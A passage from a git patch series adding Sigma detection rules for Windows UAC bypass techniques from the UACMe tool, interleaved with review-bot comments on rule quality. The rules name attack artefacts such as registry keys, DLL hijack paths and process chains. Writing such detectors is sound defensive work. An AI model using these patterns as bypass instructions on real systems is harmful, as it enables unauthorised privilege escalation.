+author: Nik Seetharaman, Christian Burkard
 modified: 2019/07/31
-date: 2019/01/16
+date: 2021/08/31
 references:
 - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
 - https://twitter.com/hFireF0X/status/897640081053364225
+ - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf
+ - https://github.com/hfiref0x/UACME
 logsource:
 category: process_creation
 product: windows
 detection:
- selection1:
- ParentCommandLine|contains: '\DllHost.exe '
- selection2:
- ParentCommandLine|endswith:
- - '{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'
- - '{3E000D72-A845-4CD9-BD83-80C07C3B881F}'
- condition: selection1 and selection2
+ selection:
+ ParentImage|endswith: '\DllHost.exe'
+ IntegrityLevel: 'High'
+ ParentCommandLine|contains:
+ - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'
+ - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}'
+ - ' /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}'
+ - ' /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}'
+ - ' /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}'
+ condition: selection
 fields:
 - CommandLine
 - ParentCommandLine
From ea77d9161ece00e6f9e4fcb316332dd8023c6f6a Mon Sep 17 00:00:00 2001
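Review bot: The second hunk rewrites `date:` from 2019/01/16 to 2021/08/31 while the context line `modified: 2019/07/31` is left untouched, so the rule now claims to have been modified two years before it was created; keep `date: 2019/01/16` and change the other line to `modified: 2021/08/31` instead. The first hunk is a description-only change. The new `ParentCommandLine|contains` values are anchored with a leading space and `/Processid:`, which is tighter than the old `endswith` on the bare CLSID, and `IntegrityLevel` is a Sysmon-provided field — worth a `definition:` line under `logsource` so users of Security 4688 know the rule cannot evaluate there.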
From: phantinuss Date: Tue, 31 Aug 2021 12:30:03 +0200 Subject: [PATCH 0642/1367] add another possible sdclt uac bypass registry path --- .../registry_event/sysmon_uac_bypass_sdclt.yml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-)
diff --git a/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml b/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml
index 5a91724f..f05853b8 100755
--- a/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml
+++ b/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml
@@ -1,21 +1,25 @@
 title: UAC Bypass via Sdclt
 id: 5b872a46-3b90-45c1-8419-f675db8053aa
 status: experimental
-description: Detects changes to HKCU:\Software\Classes\exefile\shell\runas\command\isolatedCommand
+description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
 references:
 - https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
-author: Omer Yampel
+ - https://github.com/hfiref0x/UACME
+author: Omer Yampel, Christian Burkard
 date: 2017/03/17
-modified: 2020/09/06
+modified: 2021/08/31
 logsource:
 category: registry_event
 product: windows
 detection:
- selection:
+ selection1:
 # usrclass.dat is mounted on HKU\USERSID_Classes\...
 TargetObject|startswith: 'HKU\'
 TargetObject|endswith: '_Classes\exefile\shell\runas\command\isolatedCommand'
- condition: selection
+ selection2:
+ TargetObject|endswith: '-1???_Classes\Folder\shell\open\command\SymbolicLinkValue'
+ Details|contains: '-1???\Software\Classes\'
+ condition: 1 of selection*
 tags:
 - attack.defense_evasion
 - attack.privilege_escalation
From 3a9e10d081f4f005abf68f938a024470888f98c6 Mon Sep 17 00:00:00 2001
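Review bot: `selection2` anchors the user SID with `-1???`, which only matches RIDs 1000–1999; accounts in larger domains carry longer RIDs and would fall through, and the same `-1???` pattern is used in `sysmon_uac_bypass_shell_open.yml` in the following commit. The RID fragment adds little beyond what `selection1` already does with `TargetObject|startswith: 'HKU\'`, so `TargetObject|startswith: 'HKU\'` plus `TargetObject|endswith: '_Classes\Folder\shell\open\command\SymbolicLinkValue'` and `Details|contains: '\Software\Classes\'` keeps the intent without the RID-width assumption. If `-1???` was chosen to exclude built-in accounts below RID 1000, say so in a comment next to the value, as the existing `# usrclass.dat` comment does for selection1.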
From: phantinuss Date: Tue, 31 Aug 2021 12:45:07 +0200 Subject: [PATCH 0643/1367] bulk of new rules to match working UACMe UAC bypasses --- .../sysmon_uac_bypass_cleanmgr_tmpfile.yml | 25 ++++++++++++++ .../sysmon_uac_bypass_consent_comctl32.yml | 23 +++++++++++++ .../sysmon_uac_bypass_dotnet_profiler.yml | 23 +++++++++++++ .../file_event/sysmon_uac_bypass_ieinstal.yml | 24 ++++++++++++++ .../sysmon_uac_bypass_msconfig_gui.yml | 23 +++++++++++++ .../sysmon_uac_bypass_ntfs_reparse_point.yml | 23 +++++++++++++ .../file_event/sysmon_uac_bypass_winsat.yml | 25 ++++++++++++++ .../file_event/sysmon_uac_bypass_wmp.yml | 26 +++++++++++++++ .../sysmon_uac_bypass_wow64_logger.yml | 24 ++++++++++++++ .../win_hktl_uacme_uac_bypass.yml | 24 ++++++++++++++ .../win_uac_bypass_changepk_slui.yml | 26 +++++++++++++++ .../win_uac_bypass_cleanmgr.yml | 24 ++++++++++++++ .../win_uac_bypass_consent_comctl32.yml | 24 ++++++++++++++ .../win_uac_bypass_dismhost.yml | 33 +++++++++++++++++++ .../win_uac_bypass_ieinstal.yml | 24 ++++++++++++++ .../win_uac_bypass_msconfig_gui.yml | 24 ++++++++++++++ .../win_uac_bypass_ntfs_reparse_point.yml | 32 ++++++++++++++++++ .../win_uac_bypass_pkgmgr_dism.yml | 24 ++++++++++++++ .../win_uac_bypass_winsat.yml | 24 ++++++++++++++ .../process_creation/win_uac_bypass_wmp.yml | 27 +++++++++++++++ .../win_uac_bypass_wsreset.yml | 25 ++++++++++++++ .../sysmon_uac_bypass_shell_open.yml | 24 ++++++++++++++ .../sysmon_uac_bypass_winsat.yml | 25 ++++++++++++++ .../registry_event/sysmon_uac_bypass_wmp.yml | 23 +++++++++++++ 24 files changed, 599 insertions(+) create mode 100644 rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml create mode 100644 rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml create mode 100644 rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml create mode 100644 rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml create mode 100644 rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml create mode 
100644 rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml create mode 100644 rules/windows/file_event/sysmon_uac_bypass_winsat.yml create mode 100644 rules/windows/file_event/sysmon_uac_bypass_wmp.yml create mode 100644 rules/windows/process_access/sysmon_uac_bypass_wow64_logger.yml create mode 100644 rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_changepk_slui.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_cleanmgr.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_dismhost.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_ieinstal.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_winsat.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_wmp.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_wsreset.yml create mode 100644 rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml create mode 100644 rules/windows/registry_event/sysmon_uac_bypass_winsat.yml create mode 100644 rules/windows/registry_event/sysmon_uac_bypass_wmp.yml
diff --git a/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml b/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml
new file mode 100644
index 00000000..fca1e671
--- /dev/null
+++ b/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml
@@ -0,0 +1,25 @@
+title: UAC Bypass Using Cleanmgr Temp File Creation
+id: 6a8a8a65-15ac-4722-adb7-c93c213c180a
+description: Detects the pattern of UAC bypass using cleanmgr.exe to create temporary files (UACMe 63)
+author: Christian Burkard
+date: 2021/08/30
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: file_event
+ product: windows
+detection:
+ selection:
+ Image: 'C:\Windows\system32\cleanmgr.exe'
+ TargetFilename|startswith: 'C:\Users\'
+ TargetFilename|contains: '\AppData\Local\Temp\'
+ TargetFilename|endswith: '.dll'
+ condition: selection
diff --git a/rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml b/rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml
new file mode 100644
index 00000000..da6b278e
--- /dev/null
+++ b/rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml
@@ -0,0 +1,23 @@
+title: UAC Bypass Using Consent and Comctl32 - File
+id: 62ed5b55-f991-406a-85d9-e8e8fdf18789
+description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
+author: Christian Burkard
+date: 2021/08/23
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: file_event
+ product: windows
+detection:
+ selection:
+ TargetFilename|startswith: 'C:\Windows\System32\consent.exe.@'
+ TargetFilename|endswith: '\comctl32.dll'
+ condition: selection
\ No newline at end of file
diff --git a/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml b/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
new file mode 100644
index 00000000..574a79b9
--- /dev/null
+++ b/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
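Review bot: `Image: 'C:\Windows\system32\cleanmgr.exe'` in the first hunk and `TargetFilename|startswith: 'C:\Windows\System32\consent.exe.@'` in the second hard-code the system drive and Windows directory, so hosts with a non-default `%SystemRoot%` never match; `Image|endswith: '\system32\cleanmgr.exe'` and `TargetFilename|contains: '\System32\consent.exe.@'` keep the same specificity without that assumption. Several other rules in this commit do the same with `C:\Users\` and `C:\Windows\`; the `':\Windows\SysWOW64\'` form in `sysmon_uac_bypass_wow64_logger.yml` is the more portable idiom. The second file also lacks a trailing newline (`\ No newline at end of file`), which the test suite on this page may or may not flag.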
@@ -0,0 +1,23 @@
+title: UAC Bypass Using .NET Code Profiler on MMC
+id: 93a19907-d4f9-4deb-9f91-aac4692776a6
+description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
+author: Christian Burkard
+date: 2021/08/30
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: file_event
+ product: windows
+detection:
+ selection:
+ TargetFilename|startswith: 'C:\Users\'
+ TargetFilename|endswith: '\AppData\Local\Temp\pe386.dll'
+ condition: selection
diff --git a/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml b/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml
new file mode 100644
index 00000000..6e61f089
--- /dev/null
+++ b/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml
@@ -0,0 +1,24 @@
+title: UAC Bypass Using IEInstal - File
+id: bdd8157d-8e85-4397-bb82-f06cc9c71dbb
+description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
+author: Christian Burkard
+date: 2021/08/30
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: file_event
+ product: windows
+detection:
+ selection:
+ Image: 'C:\Program Files\Internet Explorer\IEInstal.exe'
+ TargetFilename|startswith: 'C:\Users\'
+ TargetFilename|endswith: '\AppData\Local\Temp\IDC1.tmp\[1]consent.exe'
+ condition: selection
diff --git a/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml b/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml
new file mode 100644
index 00000000..cc0d08e6
--- /dev/null
+++ b/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml
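Review bot: In the IEInstal hunk, `Image: 'C:\Program Files\Internet Explorer\IEInstal.exe'` is an exact match and so misses the 32-bit copy under `C:\Program Files (x86)\Internet Explorer\` on 64-bit systems; the process-creation twin of this rule later in the commit already uses `ParentImage|endswith: '\ieinstal.exe'`, so `Image|endswith: '\Internet Explorer\IEInstal.exe'` would bring the two into line. In the .NET profiler hunk the only discriminator is the file name `pe386.dll` in a user's Temp directory, which appears to be the reference tool's default artefact rather than something inherent to the technique; a short note in `description:` saying the rule keys on that default name would keep coverage from being overestimated.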
@@ -0,0 +1,23 @@
+title: UAC Bypass Using MSConfig Token Modification - File
+id: 41bb431f-56d8-4691-bb56-ed34e390906f
+description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
+author: Christian Burkard
+date: 2021/08/30
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: file_event
+ product: windows
+detection:
+ selection:
+ TargetFilename|startswith: 'C:\Users\'
+ TargetFilename|endswith: '\AppData\Local\Temp\pkgmgr.exe'
+ condition: selection
diff --git a/rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml b/rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml
new file mode 100644
index 00000000..4c8b8198
--- /dev/null
+++ b/rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml
@@ -0,0 +1,23 @@
+title: UAC Bypass Using NTFS Reparse Point - File
+id: 7fff6773-2baa-46de-a24a-b6eec1aba2d1
+description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
+author: Christian Burkard
+date: 2021/08/30
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: file_event
+ product: windows
+detection:
+ selection:
+ TargetFilename|startswith: 'C:\Users\'
+ TargetFilename|endswith: '\AppData\Local\Temp\api-ms-win-core-kernel32-legacy-l1.DLL'
+ condition: selection
diff --git a/rules/windows/file_event/sysmon_uac_bypass_winsat.yml b/rules/windows/file_event/sysmon_uac_bypass_winsat.yml
new file mode 100644
index 00000000..74017b15
--- /dev/null
+++ b/rules/windows/file_event/sysmon_uac_bypass_winsat.yml
@@ -0,0 +1,25 @@
+title: UAC Bypass Abusing Winsat Path Parsing - File
+id: 155dbf56-e0a4-4dd0-8905-8a98705045e8
+description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
+author: Christian Burkard
+date: 2021/08/30
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: file_event
+ product: windows
+detection:
+ selection:
+ TargetFilename|startswith: 'C:\Users\'
+ TargetFilename|endswith:
+ - '\AppData\Local\Temp\system32\winsat.exe'
+ - '\AppData\Local\Temp\system32\winmm.dll'
+ condition: selection
diff --git a/rules/windows/file_event/sysmon_uac_bypass_wmp.yml b/rules/windows/file_event/sysmon_uac_bypass_wmp.yml
new file mode 100644
index 00000000..efb7a09c
--- /dev/null
+++ b/rules/windows/file_event/sysmon_uac_bypass_wmp.yml
@@ -0,0 +1,26 @@
+title: UAC Bypass Using Windows Media Player - File
+id: 68578b43-65df-4f81-9a9b-92f32711a951
+description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
+author: Christian Burkard
+date: 2021/08/23
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: file_event
+ product: windows
+detection:
+ selection1:
+ TargetFilename|startswith: 'C:\Users\'
+ TargetFilename|endswith: '\AppData\Local\Temp\OskSupport.dll'
+ selection2:
+ Image: 'C:\Windows\system32\DllHost.exe'
+ TargetFilename: 'C:\Program Files\Windows Media Player\osk.exe'
+ condition: 1 of selection*
diff --git a/rules/windows/process_access/sysmon_uac_bypass_wow64_logger.yml b/rules/windows/process_access/sysmon_uac_bypass_wow64_logger.yml
new file mode 100644
index 00000000..bf6ac9d8
--- /dev/null
+++ b/rules/windows/process_access/sysmon_uac_bypass_wow64_logger.yml
@@ -0,0 +1,24 @@
+title: UAC Bypass Using WOW64 Logger DLL Hijack
+id: 4f6c43e2-f989-4ea5-bcd8-843b49a0317c
+description: Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)
+author: Christian Burkard
+date: 2021/08/23
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+logsource:
+ category: process_access
+ product: windows
+detection:
+ selection:
+ SourceImage|contains: ':\Windows\SysWOW64\'
+ GrantedAccess: '0x1fffff'
+ CallTrace|startswith: 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
diff --git a/rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml b/rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml
new file mode 100644
index 00000000..09ac275e
--- /dev/null
+++ b/rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml
@@ -0,0 +1,24 @@
+title: UAC Bypass Tool UACMe
+id: d38d2fa4-98e6-4a24-aff1-410b0c9ad177
+description: Detects execution of UACMe (a tool used for UAC bypass) via default PE metadata
+author: Christian Burkard
+date: 2021/08/30
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ - Product: 'UACMe'
+ - Company: 'REvol Corp'
+ - OriginalFileName: 'Akagi.exe'
+ condition: selection
diff --git a/rules/windows/process_creation/win_uac_bypass_changepk_slui.yml b/rules/windows/process_creation/win_uac_bypass_changepk_slui.yml
new file mode 100644
index 00000000..b7c37d4e
--- /dev/null
+++ b/rules/windows/process_creation/win_uac_bypass_changepk_slui.yml
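Review bot: The UACMe hunk matches on `Product`, `Company` and `OriginalFileName`, which are Sysmon event 1 fields that Security 4688 does not carry, yet `logsource` gives only the generic `process_creation` category; a `definition:` line under `logsource` (as the PowerShell rule later on this page does) would tell deployers the rule is inert on non-Sysmon sources. The description already says "default PE metadata", which is the honest scope — the rule is a tool signature, not a technique detection, and that is worth keeping visible. In the WOW64 logger hunk, `selection` constrains only the source image, access mask and call trace with no `TargetImage`, so any SysWOW64 process opening any target with full access and an unresolved call trace fires; if that breadth is intentional, a comment saying why no target constraint is used would help, and `falsepositives`/`level` sit after `detection` here while every other rule in the commit places them before `logsource`.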
@@ -0,0 +1,26 @@
+title: UAC Bypass Using ChangePK and SLUI
+id: 503d581c-7df0-4bbe-b9be-5840c0ecc1fc
+description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
+author: Christian Burkard
+date: 2021/08/23
+status: experimental
+references:
+ - https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b
+ - https://github.com/hfiref0x/UACME
+ - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ Image|endswith: '\changepk.exe'
+ ParentImage|endswith: '\slui.exe'
+ IntegrityLevel: 'High'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
diff --git a/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml b/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml
new file mode 100644
index 00000000..91546a9b
--- /dev/null
+++ b/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml
@@ -0,0 +1,24 @@
+title: UAC Bypass Using Disk Cleanup
+id: b697e69c-746f-4a86-9f59-7bfff8eab881
+description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
+author: Christian Burkard
+date: 2021/08/30
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ CommandLine|endswith: '"\system32\cleanmgr.exe /autoclean /d C:'
+ ParentCommandLine: 'C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule'
+ IntegrityLevel: 'High'
+condition: selection
diff --git a/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml b/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml
new file mode 100644
index 00000000..61fb4b62
--- /dev/null
+++ b/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml
@@ -0,0 +1,24 @@
+title: UAC Bypass Using Consent and Comctl32 - Process
+id: 1ca6bd18-0ba0-44ca-851c-92ed89a61085
+description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
+author: Christian Burkard
+date: 2021/08/23
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ ParentImage|endswith: '\consent.exe'
+ Image|endswith: '\werfault.exe'
+ IntegrityLevel: 'System'
+ condition: selection
diff --git a/rules/windows/process_creation/win_uac_bypass_dismhost.yml b/rules/windows/process_creation/win_uac_bypass_dismhost.yml
new file mode 100644
index 00000000..f0c206f6
--- /dev/null
+++ b/rules/windows/process_creation/win_uac_bypass_dismhost.yml
@@ -0,0 +1,33 @@
+title: UAC Bypass Using DismHost
+id: 853e74f9-9392-4935-ad3b-2e8c040dae86
+description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
+author: Christian Burkard
+date: 2021/08/30
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection1:
+ ParentImage|contains|all:
+ - 'C:\Users\'
+ - '\AppData\Local\Temp\'
+ - '\DismHost.exe'
+ IntegrityLevel: 'High'
+ selection2:
+ Image|contains|all:
+ - 'C:\Users\'
+ - '\AppData\Local\Temp\'
+ - '\DismHost.exe'
+ IntegrityLevel: 'High'
+ ParentCommandLine: 'C:\Windows\system32\cleanmgr.exe /autoclean /d C:'
+ condition: 1 of selection*
diff --git a/rules/windows/process_creation/win_uac_bypass_ieinstal.yml b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml
new file mode 100644
index 00000000..e45aa045
--- /dev/null
+++ b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml
@@ -0,0 +1,24 @@
+title: UAC Bypass Using IEInstal - Process
+id: 80fc36aa-945e-4181-89f2-2f907ab6775d
+description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
+author: Christian Burkard
+date: 2021/08/30
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ IntegrityLevel: 'High'
+ ParentImage|endswith: '\ieinstal.exe'
+ Image|endswith: '\AppData\Local\Temp\IDC1.tmp\[1]consent.exe'
+ condition: selection
diff --git a/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml b/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml
new file mode 100644
index 00000000..7d2f6aae
--- /dev/null
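Review bot: In the DismHost hunk, `selection2` pins `ParentCommandLine: 'C:\Windows\system32\cleanmgr.exe /autoclean /d C:'` as an exact string, while the cleanmgr rule earlier in this commit describes what looks like the same process with `CommandLine|endswith: '"\system32\cleanmgr.exe /autoclean /d C:'`, i.e. with a quote before `\system32`; the two forms cannot both be literal captures of one command line, so one of them was probably hand-edited — a Sysmon sample should settle which spelling is real, or the exact match here could become `ParentCommandLine|endswith: '\cleanmgr.exe /autoclean /d C:'`. `selection1` accepts any child of a Temp-resident DismHost.exe at High integrity, which is deliberately broad; a one-line comment saying so would save the next reviewer from tightening it by mistake.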
+++ b/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml
@@ -0,0 +1,24 @@
+title: UAC Bypass Using MSConfig Token Modification - Process
+id: ad92e3f9-7eb6-460e-96b1-582b0ccbb980
+description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
+author: Christian Burkard
+date: 2021/08/30
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ IntegrityLevel: 'High'
+ ParentImage|endswith: '\AppData\Local\Temp\pkgmgr.exe'
+ CommandLine: '"C:\Windows\system32\msconfig.exe" -5'
+ condition: selection
diff --git a/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml b/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml
new file mode 100644
index 00000000..a0f828e8
--- /dev/null
+++ b/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml
@@ -0,0 +1,32 @@
+title: UAC Bypass Using NTFS Reparse Point - Process
+id: 39ed3c80-e6a1-431b-9df3-911ac53d08a7
+description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
+author: Christian Burkard
+date: 2021/08/30
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection1:
+ CommandLine|startswith: '"C:\Windows\system32\wusa.exe" /quiet C:\Users\'
+ CommandLine|endswith: '\AppData\Local\Temp\update.msu'
+ IntegrityLevel: 'High'
+ selection2:
+ ParentCommandLine: '"C:\Windows\system32\dism.exe" /online /quiet /norestart /add-package /packagepath:"C:\Windows\system32\pe386" /ignorecheck'
+ IntegrityLevel: 'High'
+ CommandLine|contains|all:
+ - 'C:\Users\'
+ - '\AppData\Local\Temp\'
+ - '\dismhost.exe {'
+ Image|endswith: '\DismHost.exe'
+ condition: 1 of selection*
diff --git a/rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml b/rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml
new file mode 100644
index 00000000..570938ee
--- /dev/null
+++ b/rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml
@@ -0,0 +1,24 @@
+title: UAC Bypass Using PkgMgr and DISM
+id: a743ceba-c771-4d75-97eb-8a90f7f4844c
+description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
+author: Christian Burkard
+date: 2021/08/23
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ ParentImage|endswith: '\pkgmgr.exe'
+ Image|endswith: '\dism.exe'
+ IntegrityLevel: 'High'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
\ No newline at end of file
diff --git a/rules/windows/process_creation/win_uac_bypass_winsat.yml b/rules/windows/process_creation/win_uac_bypass_winsat.yml
new file mode 100644
index 00000000..49773539
--- /dev/null
+++ b/rules/windows/process_creation/win_uac_bypass_winsat.yml
@@ -0,0 +1,24 @@
+title: UAC Bypass Abusing Winsat Path Parsing - Process
+id: 7a01183d-71a2-46ad-ad5c-acd989ac1793
+description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
+author: Christian Burkard
+date: 2021/08/30
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ IntegrityLevel: 'High'
+ ParentImage|endswith: '\AppData\Local\Temp\system32\winsat.exe'
+ ParentCommandLine|contains: 'C:\Windows \system32\winsat.exe'
+ condition: selection
diff --git a/rules/windows/process_creation/win_uac_bypass_wmp.yml b/rules/windows/process_creation/win_uac_bypass_wmp.yml
new file mode 100644
index 00000000..6b1691be
--- /dev/null
+++ b/rules/windows/process_creation/win_uac_bypass_wmp.yml
@@ -0,0 +1,27 @@
+title: UAC Bypass Using Windows Media Player - Process
